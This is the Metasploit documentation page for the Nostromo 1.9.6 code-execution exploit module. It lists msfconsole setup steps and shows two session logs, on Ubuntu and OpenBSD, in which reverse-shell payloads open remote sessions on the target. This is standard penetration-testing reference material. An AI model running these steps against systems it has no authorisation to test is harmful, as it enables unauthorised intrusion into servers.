ContextQMD
Back to Metasploit Framework

Nostromo Code Exec

documentation/modules/exploit/multi/http/nostromo_code_exec.md

6.4.1313.2 KB
Original Source

Vulnerable Application

Verified against:

  • Nostromo 1.9.6 on Linux

Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/nostromo_code_exec
  4. Do: set rport <port>
  5. Do: set rhost <ip>
  6. Do: check
  7. Do: set payload linux/x86/meterpreter/reverse_tcp
  8. Do: set lhost <ip>
  9. Do: exploit
  10. You should get a shell.

Scenarios

Example utilizing nostromo 1.9.6 on Ubuntu Linux.

msf > use exploit/multi/http/nostromo_code_exec
msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(multi/http/nostromo_code_exec) > set RPORT 8000
RPORT => 8000
msf exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8000 - The target appears to be vulnerable.
msf exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 192.168.1.9
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : nostromo.local
OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit

nostromo 1.9.6 on OpenBSD.

msf > use exploit/multi/http/nostromo_code_exec
msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(multi/http/nostromo_code_exec) > set RPORT 8001
RPORT => 8001
msf exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8001 - The target appears to be vulnerable.
msf exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100
id
uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uname -avr
OpenBSD nostromo.local 6.4 GENERIC#349 amd64
^C
Abort session 1? [y/N]  y
[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit